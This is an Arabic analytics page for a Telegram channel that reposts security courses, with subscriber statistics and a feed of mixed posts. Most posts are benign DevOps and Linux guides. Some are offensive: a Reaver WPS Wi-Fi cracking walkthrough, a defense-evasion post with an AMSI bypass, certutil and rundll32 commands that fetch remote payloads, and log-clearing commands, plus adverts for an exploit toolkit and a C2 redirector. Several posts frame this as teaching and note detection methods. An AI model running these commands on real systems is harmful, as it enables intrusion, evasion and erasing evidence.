ar
Feedback
All Security Engineering Courses

All Security Engineering Courses

الذهاب إلى القناة على Telegram

This channel is being updated often with older than 2020 courses, ebooks, videos, code, etc. to be used responsibly by everyone in CyberSecurity in an ethical manner. Lots of content is being downloaded from other channels or forwarded here. Bookmark me!

إظهار المزيد

📈 نظرة تحليلية على قناة تيليجرام All Security Engineering Courses

تُعد قناة All Security Engineering Courses (@allsecurityengineeringcourses) في القطاع اللغوي الإنكليزية لاعباً نشطاً. يضم المجتمع حالياً 19 249 مشتركاً، محتلاً المرتبة 6 647 في فئة التكنولوجيات والتطبيقات والمرتبة 33 952 في منطقة روسيا.

📊 مؤشرات الجمهور والحراك

منذ تأسيسه في невідомо، حقق المشروع نمواً سريعاً وجمع 19 249 مشتركاً.

بحسب آخر البيانات بتاريخ 06 أكتوبر, 2026، تحافظ القناة على نشاط مستقر. خلال آخر 30 يوماً تغيّر عدد الأعضاء بمقدار 81، وفي آخر 24 ساعة بمقدار -3، مع بقاء الوصول العام مرتفعاً.

  • حالة التحقق: غير موثّقة
  • معدل التفاعل (ER): يبلغ متوسط تفاعل الجمهور 9.22‎%. وخلال أول 24 ساعة من النشر يحصد المحتوى عادةً 2.78‎% من ردود الفعل نسبةً إلى إجمالي المشتركين.
  • وصول المنشورات: يحصل كل منشور على متوسط 1 775 مشاهدة. وخلال اليوم الأول يجمع عادةً 535 مشاهدة.
  • التفاعلات والاستجابة: يتفاعل الجمهور بانتظام؛ متوسط التفاعلات لكل منشور يبلغ 9.
  • الاهتمامات الموضوعية: يركز المحتوى على مواضيع رئيسية مثل git, strace, github, linux, docker.

📝 الوصف وسياسة المحتوى

يصف المؤلف القناة بأنها مساحة للتعبير عن الآراء الذاتية:
“This channel is being updated often with older than 2020 courses, ebooks, videos, code, etc. to be used responsibly by everyone in CyberSecurity in an ethical manner. Lots of content is being downloaded from other channels or forwarded here. Bookmar...”

بفضل وتيرة التحديث المرتفعة (أحدث البيانات بتاريخ 07 أكتوبر, 2026) تحافظ القناة على حداثتها ومستوى وصول مرتفع. وتُظهر التحليلات تفاعلاً نشطاً من الجمهور، ما يجعلها نقطة تأثير مهمة ضمن فئة التكنولوجيات والتطبيقات.

19 249
المشتركون
-324 ساعات
لا توجد بيانات7 أيام
+8130 أيام

جاري تحميل البيانات...

جذب المشتركين
أكتوبر '26
أكتوبر '26
+39
في 0 قنوات
سبتمبر '26
+187
في 0 قنوات
Get PRO
أغسطس '26
+216
في 0 قنوات
Get PRO
يوليو '26
+256
في 0 قنوات
Get PRO
يونيو '26
+201
في 0 قنوات
Get PRO
مايو '26
+245
في 0 قنوات
Get PRO
أبريل '26
+165
في 0 قنوات
Get PRO
مارس '26
+92
في 0 قنوات
Get PRO
فبراير '26
+93
في 1 قنوات
Get PRO
يناير '26
+247
في 0 قنوات
Get PRO
ديسمبر '25
+252
في 2 قنوات
Get PRO
نوفمبر '25
+305
في 1 قنوات
Get PRO
أكتوبر '25
+388
في 1 قنوات
Get PRO
سبتمبر '25
+224
في 0 قنوات
Get PRO
أغسطس '25
+607
في 0 قنوات
Get PRO
يوليو '25
+84
في 0 قنوات
Get PRO
يونيو '25
+450
في 1 قنوات
Get PRO
مايو '25
+121
في 0 قنوات
Get PRO
أبريل '25
+81
في 1 قنوات
Get PRO
مارس '25
+38
في 0 قنوات
Get PRO
فبراير '25
+36
في 0 قنوات
Get PRO
يناير '25
+43
في 1 قنوات
Get PRO
ديسمبر '24
+139
في 0 قنوات
Get PRO
نوفمبر '24
+274
في 0 قنوات
Get PRO
أكتوبر '24
+265
في 0 قنوات
Get PRO
سبتمبر '24
+3 110
في 0 قنوات
Get PRO
أغسطس '24
+3 911
في 0 قنوات
Get PRO
يوليو '24
+1 619
في 0 قنوات
Get PRO
يونيو '24
+1 278
في 1 قنوات
Get PRO
مايو '24
+1 619
في 1 قنوات
Get PRO
أبريل '24
+1 749
في 0 قنوات
Get PRO
مارس '24
+1 921
في 1 قنوات
Get PRO
فبراير '24
+1 487
في 1 قنوات
Get PRO
يناير '24
+1 200
في 0 قنوات
Get PRO
ديسمبر '23
+846
في 0 قنوات
التاريخ
نمو المشتركين
الإشارات
القنوات
07 أكتوبر+6
06 أكتوبر+6
05 أكتوبر+1
04 أكتوبر+10
03 أكتوبر+5
02 أكتوبر+6
01 أكتوبر+5
منشورات القناة
💻 Проблемы БД или почему большой продакшн спасут только массовые расстрелы запросов 💡 Изучаем детали: За счёт правильных, д
💻 Проблемы БД или почему большой продакшн спасут только массовые расстрелы запросов 💡 Изучаем детали: За счёт правильных, даже необязательно новых, а просто верно выбранных архитектурных подходов можно заставить работать не один конкретный запрос, а тысячу или даже  миллион. Это становится краеугольным камнем, потому что объёмы данных растут с такой скоростью, которую мы даже представить себе не могли ещё пять лет назад. Привет, участникам CodeGuard! Именно так считает наш сегодняшний гость – Дмитрий Немчин, руководитель направления эксплуатации инфраструктуры данных в Т-банке и по совместительству член программного комитетаData Internals, профессиональной ко... 📚 Перейти к статье 😈 CodeGuard: PySec Edition | #python

2
Beginning of the CodeGuard: PySec channel
894
3
Absolutely, Ville — here’s a clean, future‑proof summary of every step you took to get Jenkins + Docker + SonarQube + Trivy + OWASP DC working inside a single Jenkins container. This is the kind of reference you’ll be glad you saved. --- # 🧱 FULL SETUP SUMMARY — Jenkins CI/CD in a Single Container Below is the complete, ordered list of what you did, why you did it, and the exact commands or UI steps involved. --- # 🟦 1. Run Jenkins in Docker with access to host Docker You started Jenkins with: - Host Docker socket mounted - Jenkins home volume - Port 8080 exposed This allows Jenkins to run Docker builds using the host engine. --- # 🟦 2. Install required tools inside the Jenkins container Inside the container: apt-get update apt-get install -y docker.io unzip openjdk-17-jdk nodejs npm You now have: - Docker CLI - JDK 17 - NodeJS - unzip All available to Jenkins. --- # 🟦 3. Install Sonar Scanner manually Downloaded and extracted: cd /opt wget https://github.com/SonarSource/sonar-scanner-cli/releases/download/4.4.0.2170/sonar-scanner-cli-4.4.0.2170-linux.zip unzip sonar-scanner-cli-4.4.0.2170-linux.zip mv sonar-scanner-4.4.0.2170-linux sonar-scanner Scanner path: /opt/sonar-scanner --- # 🟦 4. Install required Jenkins plugins From Manage Jenkins → Plugins: - SonarQube Scanner for Jenkins - SonarQube - NodeJS - OWASP Dependency Check - Email Extension - Pipeline - Docker Pipeline (optional) --- # 🟦 5. Configure tools in Jenkins UI ### JDK Manage Jenkins → Global Tool Configuration → JDK - Name: jdk17 - Uncheck “Install automatically” - JAVA_HOME: ``` /usr/lib/jvm/java-17-openjdk-amd64 ``` ### NodeJS - Name: node16 - Uncheck “Install automatically” ### Sonar Scanner - Name: sonar-scanner - Uncheck “Install automatically” - Installation directory: ``` /opt/sonar-scanner ``` --- # 🟦 6. Run SonarQube server on the host You used: docker run -d --name sonarqube \ -p 9000:9000 \ -v sonarqube_data:/opt/sonarqube/data \ -v sonarqube_logs:/opt/sonarqube/logs \ -v sonarqube_extensions:/opt/sonarqube/extensions \ sonarqube:lts-community --- # 🟦 7. Configure SonarQube in Jenkins Manage Jenkins → Configure System → SonarQube Servers - Name: sonar-server - URL: http://<host-ip>:9000 - Token: (generated in SonarQube UI) Matches Jenkinsfile: withSonarQubeEnv('sonar-server') --- # 🟦 8. Add credentials in Jenkins Path: Manage Jenkins → Credentials → System → Global credentials → Add Credentials You added: - DockerHub credentials (docker-cred) - SonarQube token (sonar-token) --- # 🟦 9. Fix Docker permission issue inside Jenkins container This was the big one. ### Problem: Host Docker socket group ID = 984 Container docker group ID = 102 ### Fix: recreate docker group inside container with correct GID Inside container: groupdel docker groupadd -g 984 docker usermod -aG docker jenkins Restart container: docker restart jenkins Verify: docker exec -it jenkins bash id jenkins docker ps Now Docker works. --- # 🟦 10. Run the pipeline — SUCCESS Your Jenkinsfile worked without modification because: - All tools were installed inside the container - Jenkins had access to Docker - SonarQube was reachable - Trivy and OWASP DC were installed - Credentials were configured --- # 🎉 Final Result You now have a fully functional DevSecOps pipeline running entirely inside a single Jenkins container, including: - Git checkout - SonarQube analysis - Quality gate - NPM install - OWASP Dependency Check - Trivy FS scan - Docker build - Docker push - Trivy image scan - Deployment - Email notifications This is a complete, production‑grade CI/CD pipeline.
982
4
MIT made its entire AI & ML library 100% FREE to access. These 12 books are the best place to start 👇 ↳ 𝗙𝗼𝘂𝗻𝗱𝗮𝘁𝗶𝗼𝗻𝘀 1. Foundations of Machine Learning https://cs.nyu.edu/~mohri/mlbook/ The mathematical backbone of ML - algorithms, theory, and how models actually learn. 2. Understanding Deep Learning https://udlbook.github.io/udlbook/ Neural networks explained visually and intuitively, from basics to modern architectures. 3. Deep Learning https://www.deeplearningbook.org/ The definitive deep learning reference, written by the researchers who shaped the field. 4. Introduction to Machine Learning Systems https://mlsysbook.ai/ How to design and build ML systems that work in production, not just in notebooks. 5. Algorithms for Optimization https://algorithmsbook.com/optimization/ The math behind how models improve - gradient methods, search, and decision-making. ↳ 𝗥𝗲𝗶𝗻𝗳𝗼𝗿𝗰𝗲𝗺𝗲𝗻𝘁 𝗟𝗲𝗮𝗿𝗻𝗶𝗻𝗴 6. Reinforcement Learning: An Introduction http://incompleteideas.net/book/the-book.html The classic RL textbook - how agents learn to make decisions through trial and reward. 7. Distributional Reinforcement Learning https://www.distributional-rl.org/ Goes beyond average rewards to model the full distribution of outcomes. 8. Multi-Agent Reinforcement Learning https://www.marl-book.com/ How multiple AI agents learn, compete, and cooperate in shared environments. ↳ 𝗣𝗿𝗼𝗯𝗮𝗯𝗶𝗹𝗶𝘀𝘁𝗶𝗰 𝗠𝗟 9. Probabilistic Machine Learning: An Introduction https://probml.github.io/pml-book/book1.html ML through the lens of probability - uncertainty, inference, and Bayesian thinking. 10. Probabilistic Machine Learning: Advanced Topics https://probml.github.io/pml-book/book2.html Deep dives into probabilistic models, approximate inference, and generative methods. ↳ 𝗥𝗲𝘀𝗽𝗼𝗻𝘀𝗶𝗯𝗹𝗲 & 𝗔𝗴𝗲𝗻𝘁𝗶𝗰 𝗔𝗜 11. Agents in the Long Game of AI https://direct.mit.edu/books/oa-monograph/5779/Agents-in-the-Long-Game-of-AIComputational How to build AI agents that are trustworthy, hybrid, and designed for long-term reliability. 12. Fairness and Machine Learning https://fairmlbook.org/ Where ML meets society - bias, discrimination, and how to build more equitable systems. ⭕️ Join for more: @DarkWeb_VIP https://t.me/+YyUiTGOgxFJmYTU8
1 042
5
Mosse Institute – MRT – Certified Red Teamer 2026 Pass : @Offensiv3Sec
Mosse Institute – MRT – Certified Red Teamer 2026 Pass : @Offensiv3Sec
1 137
6
😈 Reaver — как я взломал Wi-Fi за 4 часа через WPS (тест безопасности!) Думал, что WPS — это просто удобство для роутера? А
😈 Reaver — как я взломал Wi-Fi за 4 часа через WPS (тест безопасности!) Думал, что WPS — это просто удобство для роутера? А на деле — огромная дыра. Reaver брутит PIN-код WPS и выдает WPA/WPA2 пароль. Многие роутеры падают за 4-10 часов. 🔍 Мой опыт: тестировал свою сеть и соседскую (с разрешения, конечно, а ты что подумал какую соседскую.. 😉) ⚪️ Шаг 1: Готовим интерфейс sudo airmon-ng start wlan0 # mon0 готов к охоте sudo airmon-ng check kill # убиваем мешающие процессы ⚪️Шаг 2: Ищем жертву с WPS sudo wash -i wlan0mon --ignore-locked Ищем сети с WPS Locked: No — вот они, наши цели! ⚪️ Шаг 3: Лобовая атака Reaver sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv -c 6 -K 1 - -vv — спамит логами, чтобы видеть прогресс - -c 6 — фиксируем канал (из wash) - -K 1 — stealth mode против блокировок 🔥 Мои настройки для стабильности: --no-timeout # не сбрасывать при глюках --dh-small # быстрее, но чуть менее надежно --force-ns-noresp # игнорируем неответы ⏱️ Результат: TP-Link пал за 4:17. D-Link продержался 7 часов. ⚠️ Важно: - WPS Locked = игра окончена, роутер заблокировал атаки - Качество сигнала > -60dB, иначе тормоза - Pixie Dust атака (pixiewps) может сократить до минут! 🛡 Защита (сразу после теста): 1. Отключи WPS в настройках роутера 2. Поменяй пароль на 20+ символов 3. Обнови прошивку (часто фиксит WPS) 📱 Посмотреть код 😈 CodeGuard: PySec Edition | Чат
2 039
7
SEC760.z03
1
8
⭐️ SANS - SEC760 Advanced Exploit Development for Penetration Testers
⭐️ SANS - SEC760 Advanced Exploit Development for Penetration Testers
2 296
9
https://www.udemy.com/course/free-learn-c-tutorial-beginners/
1 847
10
Real-world scenario [1]: (OTP bypass via logic flaw) Start your hacking journey with us: codelivly.com Grab the best hands on
Real-world scenario [1]: (OTP bypass via logic flaw) Start your hacking journey with us: codelivly.com Grab the best hands on resources from : resources.codelivly.com
2 823
11
🔥 Enterprise Network Penetration Testing — Hands-On Pentesting Book Ready to move beyond basic Nmap scans? 🛡 Learn how real enterprise security assessments work — from internal reconnaissance & network enumeration to Active Directory attacks, lateral movement, detection & professional reporting. 📚 205+ pages 🎯 53 chapters + 40+ diagrams 💻 Hands-on labs & practical workflows 🩸 Active Directory + BloodHound + Kerberos 🔵 Detection with Wazuh, Sysmon, Zeek & Suricata 📊 Professional pentest reporting & risk assessment Perfect for Pentesters, Red Teamers, SOC Analysts, Blue Teamers & Cybersecurity Students. 👉 Get the book: https://resources.codelivly.com/product/enterprise-network-penetration-testing/
2 442
12
🔗 Ligolo - The Art Of Internal Network Pivoting
3 093
13
🗺 OSCP+ Active Directory Network Walkthrough
4 623
14
🐧 Шпаргалка: 10 команд Linux, которые должен знать каждый системный администратор Навигация, управление пользователями и сет
🐧 Шпаргалка: 10 команд Linux, которые должен знать каждый системный администратор Навигация, управление пользователями и сетью — база, без которой никуда. Сохраняйте. 1. Перемещение по файловой системе: cd /home # перейти в каталог ls -la # список файлов (включая скрытые) pwd # текущая папка 2. Управление пользователями: sudo adduser john # создать пользователя sudo userdel john # удалить пользователя passwd # сменить пароль 3. Права доступа: chmod 755 file # rwxr-xr-x chown user:group file # сменить владельца 4. Процессы: ps aux | grep nginx # найти процесс kill -9 1234 # убить процесс htop # мониторинг в реальном времени 5. Сеть: ping -c 4 8.8.8.8 # проверить связь ss -tulpn # все открытые порты curl -I example.com # посмотреть заголовки 6. Диски и память: df -h # свободное место на дисках du -sh /var/log # размер папки free -h # свободная RAM 7. Логи: tail -f /var/log/syslog # смотреть логи в реальном времени journalctl -f -u ssh # логи службы SSH 8. Архивация: tar -czvf backup.tar.gz /home # создать архив tar -xzvf backup.tar.gz # распаковать 9. Поиск: find / -name "*.conf" -mtime -7 # найти файлы за последние 7 дней grep -r "error" /var/log/ # поиск по логам 10. Перезагрузка и выключение: sudo reboot # перезагрузка sudo shutdown -h now # выключение Сохраняйте — пригодится каждый день. 😈 CodeGuard: PySec Edition | Чат
4 559
15
🐧 Как поднять свой первый веб-сервер: установка LAMP на Ubuntu 26.04 (пошагово) Хотите запустить сайт или веб-приложение? Св
🐧 Как поднять свой первый веб-сервер: установка LAMP на Ubuntu 26.04 (пошагово) Хотите запустить сайт или веб-приложение? Связка LAMP (Linux, Apache, MySQL, PHP) — это классика, которая работает везде. Вот пошаговая инструкция для Ubuntu 26.04. Шаг 1. Обновите список пакетов sudo apt update Шаг 2. Установите Apache sudo apt install apache2 -y Шаг 3. Включите автозапуск и запустите Apache sudo systemctl enable apache2 sudo systemctl start apache2 Шаг 4. Проверьте статус sudo systemctl status apache2 Должно быть active (running) Шаг 5. Установите MySQL sudo apt install mysql-server -y Шаг 6. Включите и запустите MySQL sudo systemctl enable mysql sudo systemctl start mysql Шаг 7. Защитите MySQL sudo mysql_secure_installation — пройдите по шагам: установите пароль root, удалите анонимных пользователей, запретите удалённый доступ root. Шаг 8. Установите PHP sudo apt install php libapache2-mod-php php-mysql -y Шаг 9. Проверьте PHP Создайте тестовый файл: echo "<?php phpinfo(); ?>" | sudo tee /var/www/html/info.php Откройте в браузере http://ваш_ip/info.php — увидите информацию о PHP. 📌 Совет: после проверки удалите info.php или ограничьте к нему доступ — в целях безопасности. 👩‍💻 CodeGuard: Linux | Чат
3 427
16
Linux LPE Toolkit Multi-architecture privilege escalation toolkit with 24 exploits (amd64 pre-built; other architectures comp
Linux LPE Toolkit Multi-architecture privilege escalation toolkit with 24 exploits (amd64 pre-built; other architectures compiled via gcc at runtime). Supports amd64, arm64, 386, mips, mipsle, mips64, and mips64le. Detects kernel version, filters patched exploits, and tries each in order until root is obtained.
2 659
17
Defense Evasion: как атакующий прячется от EDR и антивируса 👋 Приветствую в мире цифровой безопасности! Сегодня расскажу про
Defense Evasion: как атакующий прячется от EDR и антивируса 👋 Приветствую в мире цифровой безопасности! Сегодня расскажу про техники Defense Evasion - как атакующий скрывает свою активность от средств защиты уже после того как закрепился в системе. ⏺Defense Evasion - это не одна техника, а целый класс. Тут задача не выполнить действие тихо один раз, а сделать так чтобы весь дальнейший процесс не триггерил алерты. Без этого закрепление в системе бесполезно: EDR увидит подозрительный процесс через час и всё оборвёт. ⏺AMSI bypass - Windows Antimalware Scan Interface проверяет PowerShell-код перед выполнением. Атакующий патчит функцию проверки прямо в памяти: $a = [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils') $b = $a.GetField('amsiInitFailed','NonPublic,Static') $b.SetValue($null,$true) После этого любой вредоносный скрипт проходит без сканирования - AMSI думает, что инициализация провалилась и просто пропускает всё дальше. ⏺Process injection - вместо запуска нового подозрительного процесса код внедряется в уже доверенный: $proc = Get-Process -Name "explorer" # Дальше через WriteProcessMemory и CreateRemoteThread # внедряем shellcode в легитимный процесс Для мониторинга - это выглядит, как обычный explorer.exe, а не как новый неизвестный бинарь - большинство базовых правил детекта смотрят именно на имя и происхождение процесса. ⏺Timestomping - меняем метки времени файла, чтобы он не выделялся среди системных: # Linux touch -r /bin/ls malicious_file stat malicious_file # Windows через PowerShell (Get-Item file.exe).CreationTime = "01/15/2020 10:00:00" Форензика часто ищет файлы созданные в момент инцидента - timestomping ломает эту эвристику полностью. ⏺Living off the land - используем только легитимные системные утилиты вместо своих инструментов, тогда сигнатурный детект бессилен: # Скачивание файла через certutil вместо curl certutil -urlcache -split -f http://10.0.0.1/payload.exe payload.exe # Выполнение через rundll32 rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://10.0.0.1/script.sct") certutil и rundll32 подписаны Microsoft и есть на каждой Windows-машине - антивирус не может просто заблокировать их целиком. ⏺Log clearing - чистим или отключаем логирование там где были: wevtutil cl Security wevtutil cl System # Linux > /var/log/auth.log history -c ⏺Детектируется через поведенческий анализ а не сигнатуры: аномальная работа с памятью легитимных процессов, вызов certutil с параметром urlcache, массовая очистка логов сразу после подозрительной активности, несоответствие timestamp файла и записей в MFT. Sysmon Event ID 1 (создание процесса) и 10 (доступ к памяти процесса) - основа для детекта большинства этих техник. ZeroDay | Серверная Админа | #defenseevasion
2 575
18
Cloudflare-Redirector Domain fronting через CloudFlare с поддержкой разных #C2, нескольких доменов и вебсокета. #evasion #раб
Cloudflare-Redirector Domain fronting через CloudFlare с поддержкой разных #C2, нескольких доменов и вебсокета. #evasion #работягам Telegram ✉️ @freedomfox
2 215
19
لا يوجد نص...
2 563
20
🔅 Raspberry Pi Essential Training 📝 Learn the basic vocabulary of Raspberry Pi, as well as how to plug in peripherals and p
🔅 Raspberry Pi Essential Training 📝 Learn the basic vocabulary of Raspberry Pi, as well as how to plug in peripherals and perform basic computing tasks. You can also gain an understanding of the GPIO and Pico boards. 🌐 Author: Mark Niemann-Ross 🔰 Level: Beginner ⏰ Duration: 2h 19m 📋 Topics: Raspberry Pi, Internet of Things 🔗 Join Linkedin Learning for more courses
2 421